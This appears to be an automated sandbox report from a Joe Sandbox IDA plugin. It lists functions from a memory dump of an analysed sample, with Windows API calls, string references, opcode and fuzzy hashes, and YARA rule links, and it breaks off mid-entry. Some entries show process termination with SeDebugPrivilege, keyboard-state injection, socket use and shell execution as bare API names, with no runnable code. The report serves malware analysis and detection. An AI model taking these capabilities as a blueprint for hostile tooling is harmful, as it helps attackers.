API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID: hE
API String ID: 1380811348-3080292677
Opcode ID: c5c5f34216b6f29cdbd34087a2342e382552496afee0aa722e18f9a396da3f40
Instruction ID: 8306e09429cbd826288984722757756da822636829c3a351b944e6a002c292db
Opcode Fuzzy Hash: c5c5f34216b6f29cdbd34087a2342e382552496afee0aa722e18f9a396da3f40
Instruction Fuzzy Hash: 3B516C75508304AFD710EF24C885EABB7E8EF89754F04491EF58A97251EB70EA04CBB2

Function 00DF9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DF9926
SendMessageW.USER32(?,00001036,00000000,?), ref: 00DF993A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DF9954
_wcscat.LIBCMT ref: 00DF99AF
SendMessageW.USER32(?,00001057,00000000,?), ref: 00DF99C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DF99F4

Strings

SysListView32, xrefs: 00DF98F8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: f55e712792857ab7610dc54cedebb0ec409e74094298311a89e8b7ca6de18d15
Instruction ID: be26b522677b66e3d1fe24441b7ef3f91359f4c4f9fe2c489cf0a72c43076c0f
Opcode Fuzzy Hash: f55e712792857ab7610dc54cedebb0ec409e74094298311a89e8b7ca6de18d15
Instruction Fuzzy Hash: 0841A471D00348AFEF219F64CC95BEEB7A8EF08350F15842AF695E7191C6719D848B70

Function 00DF1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00DD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DD6F7D
Part of subcall function 00DD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DD6F8D
Part of subcall function 00DD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DD7022

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DF168B
GetLastError.KERNEL32 ref: 00DF169E
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DF16CA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00DF1746
GetLastError.KERNEL32(00000000), ref: 00DF1751
CloseHandle.KERNEL32(00000000), ref: 00DF1786

Strings

SeDebugPrivilege, xrefs: 00DF16A9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b759481205e30c431033f7c1333a4ea239278548a3de166066c5ac56994bec26
Instruction ID: c9c58eaef29a6a5de097ed27d10c5b87c378c72501a8e8cf6bd6b83fc9a9ce4e
Opcode Fuzzy Hash: b759481205e30c431033f7c1333a4ea239278548a3de166066c5ac56994bec26
Instruction Fuzzy Hash: 87418975A04205EFDB04EF54CCA6FBDB7A5AF54714F098049FA0A9F292DB74D8048BB1

Function 00DD6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00DD62D6

Strings

stop, xrefs: 00DD62A7
blank, xrefs: 00DD6258
info, xrefs: 00DD6277
warning, xrefs: 00DD62BF
question, xrefs: 00DD628F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1b6b1a717be9c624ab166de2a3e31f8699326c6316cbe51ef347399e4bf3c4f8
Instruction ID: 5d008c7d5e07197c49e3c0242afdd17ed1780ec700507d6ce29fdf8dd533af5b
Opcode Fuzzy Hash: 1b6b1a717be9c624ab166de2a3e31f8699326c6316cbe51ef347399e4bf3c4f8
Instruction Fuzzy Hash: AA11E735209343FEE7059A659C92DAA7B98DF16324B20002BF541B6382EBA0EA4085FC

Function 00DD757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00DD7595
LoadStringW.USER32(00000000), ref: 00DD759C
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DD75B2
LoadStringW.USER32(00000000), ref: 00DD75B9
_wprintf.LIBCMT ref: 00DD75DF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD75FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00DD75DA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: ec02051c6bf2705c4d25fbc64261101d9491c239dea4c31012299a38a45567ce
Instruction ID: 2ff4fd8899f318300c13457a148853d5b59403dfcbca98a75084ddcd28d99031
Opcode Fuzzy Hash: ec02051c6bf2705c4d25fbc64261101d9491c239dea4c31012299a38a45567ce
Instruction Fuzzy Hash: 7F0136F2504208BFE711ABE5ED89EEB776CD704301F004496B746F2041EA789E888B75

Function 00DF2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2AE7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: b3c76d4d3ecc4aeaee729c6278a011cfb963c96ecea3fdc02022c6a227700489
Instruction ID: 918a6354f48dc8cc49ef867fc29d77ac9b77563dda4fb61407f56e0372d870a8
Opcode Fuzzy Hash: b3c76d4d3ecc4aeaee729c6278a011cfb963c96ecea3fdc02022c6a227700489
Instruction Fuzzy Hash: 83917831604205AFCB01EF55C891B7EB7E5FF88314F09881DFA969B2A1DB31E945CB62

Function 00DE9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00DE9B38
WSAGetLastError.WS2_32(00000000), ref: 00DE9B45
__WSAFDIsSet.WS2_32(00000000,?), ref: 00DE9B6F
WSAGetLastError.WS2_32(00000000), ref: 00DE9B9F
htons.WS2_32(?), ref: 00DE9C51
inet_ntoa.WS2_32(?), ref: 00DE9C0C

Part of subcall function 00DCE0F5: _strlen.LIBCMT ref: 00DCE0FF
Part of subcall function 00DCE0F5: _memmove.LIBCMT ref: 00DCE121

_strlen.LIBCMT ref: 00DE9CA7
_memmove.LIBCMT ref: 00DE9D10

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3637404534-0
Opcode ID: 385708acf6f13c8978cb4106822102c389101b9e27970da04e6dfcb0b6f12095
Instruction ID: 76b52d7a0507e2d14a70d73491264a2ad8e7e601601be21b986391520cef5e91
Opcode Fuzzy Hash: 385708acf6f13c8978cb4106822102c389101b9e27970da04e6dfcb0b6f12095
Instruction Fuzzy Hash: 9681DD71508240AFCB10EF25CC95EABBBE8EF88724F144A2DF5559B291DB70D904CBB2

Function 00DBB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00DBB744

Part of subcall function 00DB8A0C: __FF_MSGBANNER.LIBCMT ref: 00DB8A21
Part of subcall function 00DB8A0C: __NMSG_WRITE.LIBCMT ref: 00DB8A28
Part of subcall function 00DB8A0C: __malloc_crt.LIBCMT ref: 00DB8A48

__lock.LIBCMT ref: 00DBB757
__lock.LIBCMT ref: 00DBB7A3
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E46948,00000018,00DC6C2B,?,00000000,00000109), ref: 00DBB7BF
RtlEnterCriticalSection.NTDLL(8000000C), ref: 00DBB7DC
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00DBB7EC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 1d8309d060570f79b21a75ddd86757a219556f40247660fc400b5c09c582b016
Instruction ID: 3f0e2d86d99a0d35d136bcaaa8329a7819c6f4d33e3c47988e4bdb44bbff977b
Opcode Fuzzy Hash: 1d8309d060570f79b21a75ddd86757a219556f40247660fc400b5c09c582b016
Instruction Fuzzy Hash: A8411371D00315DBEB149F69D8443E8BBA4FF81335F14821AE426AB2D1CBB4D805CBB0

Function 00DDA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00DDA1CE

Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DDA205
RtlEnterCriticalSection.NTDLL(?), ref: 00DDA221
_memmove.LIBCMT ref: 00DDA26F
_memmove.LIBCMT ref: 00DDA28C
RtlLeaveCriticalSection.NTDLL(?), ref: 00DDA29B
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DDA2B0
InterlockedExchange.KERNEL32(?,000001F6), ref: 00DDA2CF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 0f69b98967755d70eca3f89ba8e9fb0940157d9faede383acc765aab882da272
Instruction ID: e1328a2ade2ca643b32211997da56c4aefdcdeef752c091e74d96a0de4174f8c
Opcode Fuzzy Hash: 0f69b98967755d70eca3f89ba8e9fb0940157d9faede383acc765aab882da272
Instruction Fuzzy Hash: 26318171A00205EFCB00EFA9DC85AAEBBB8EF45310B1480A5F905EB256D774DA55CB71

Function 00DF8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DF8CF3
GetDC.USER32(00000000), ref: 00DF8CFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF8D06
ReleaseDC.USER32(00000000,00000000), ref: 00DF8D12
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DF8D4E
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DF8D5F
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DF8D99
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DF8DB9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6497fed440c8526b19dcb4381e9dde321163920fd4759d020edbe51589e1ced7
Instruction ID: 4dc7bc720e3aa9d5f3deff78776e201b5bce5c694db855eef8851fc4d8de6be9
Opcode Fuzzy Hash: 6497fed440c8526b19dcb4381e9dde321163920fd4759d020edbe51589e1ced7
Instruction Fuzzy Hash: 19317C72205614BFEB118F51CC8AFEA3BADEF49765F098055FE08EA191CBB59841CB70

Function 00DE1BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2

_wcstok.LIBCMT ref: 00DE1D6E
_wcscpy.LIBCMT ref: 00DE1DFD
_memset.LIBCMT ref: 00DE1E30

Strings

t:, xrefs: 00DE1E40
X, xrefs: 00DE1E68

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$t:
API String ID: 774024439-4137454495
Opcode ID: 014e4b9ce0f6b1e608f6615ce44660f6a0e8bcf8e9f765f64dac633f3f7713e8
Instruction ID: b1a38c0eb7c06dd0081e21d7409af4e2af686b7fff385079e5a6e845ed592c44
Opcode Fuzzy Hash: 014e4b9ce0f6b1e608f6615ce44660f6a0e8bcf8e9f765f64dac633f3f7713e8
Instruction Fuzzy Hash: 86C163756083419FCB14EF24C891A9AB7E4FF85710F04492DF89A972A2DB70ED05CBB2

Function 00DAB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0afb97ef9940c85831ad799eb4c14da382c550b963fcb5806fa2f0f3f58724
Instruction ID: cb5f46904eb0c64017d7e3ff87f75cee241e63fda1dd071206ff219e3bab5c93
Opcode Fuzzy Hash: 1b0afb97ef9940c85831ad799eb4c14da382c550b963fcb5806fa2f0f3f58724
Instruction Fuzzy Hash: 67714C71900109EFCB14CF98CC44ABEBB75FF8A328F14815AF955A6292C774DA52CB70

Function 00DF2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DF214B
_memset.LIBCMT ref: 00DF2214
ShellExecuteExW.SHELL32(?), ref: 00DF2259

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2

CloseHandle.KERNEL32(00000000), ref: 00DF2320
FreeLibrary.KERNEL32(00000000), ref: 00DF232F

Strings

@, xrefs: 00DF2225

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: b5f48029bd468c90b9582ab03737c91f1812b8844da471b51cb67912e158cd59
Instruction ID: f769832d9f69a3f0bf38b0c03b3400c989a36351a81a1396841615c545d25d7a
Opcode Fuzzy Hash: b5f48029bd468c90b9582ab03737c91f1812b8844da471b51cb67912e158cd59
Instruction Fuzzy Hash: 8E717A75A00619DFCF04EFA8C8819AEBBF5FF49310B158459E956AB351DB34AE40CBB0

Function 00DD47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00DD481D
GetKeyboardState.USER32(?), ref: 00DD4832
SetKeyboardState.USER32(?), ref: 00DD4893
PostMessageW.USER32(?,00000101,00000010,?), ref: 00DD48C1
PostMessageW.USER32(?,00000101,00000011,?), ref: 00DD48E0
PostMessageW.USER32(?,00000101,00000012,?), ref: 00DD4926
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DD4949

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5cf959b05a3ed19d1888a501e61ade4fd3d7eecaef907f1df668b06613fdfa32
Instruction ID: 34ca43a8648b017c15715b120ff524c2a58af9ab1d776931ceb819c96248b6e5
Opcode Fuzzy Hash: 5cf959b05a3ed19d1888a501e61ade4fd3d7eecaef907f1df668b06613fdfa32
Instruction Fuzzy Hash: 3451C3A05087D13EFB364625CC55BBBBEA95F06304F0C858EE1D556AC2C6E4E888EB70

Function 00DD45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00DD4638
GetKeyboardState.USER32(?), ref: 00DD464D
SetKeyboardState.USER32(?), ref: 00DD46AE
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DD46DA
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DD46F7
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DD473B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DD475C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ee5c20845251e05ec07873df7c85c34891f60a31ad90aec57f86ded27f3ca636
Instruction ID: d9752661a124ca59403054a5e94545172c5ab169dc51c67e310440d799b6eb8e
Opcode Fuzzy Hash: ee5c20845251e05ec07873df7c85c34891f60a31ad90aec57f86ded27f3ca636
Instruction Fuzzy Hash: 2151D4A05047D57FFB3687248C55BBABF99AB06304F0C848AE1E556AC2D3A4EC98D770

Function 00DD86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

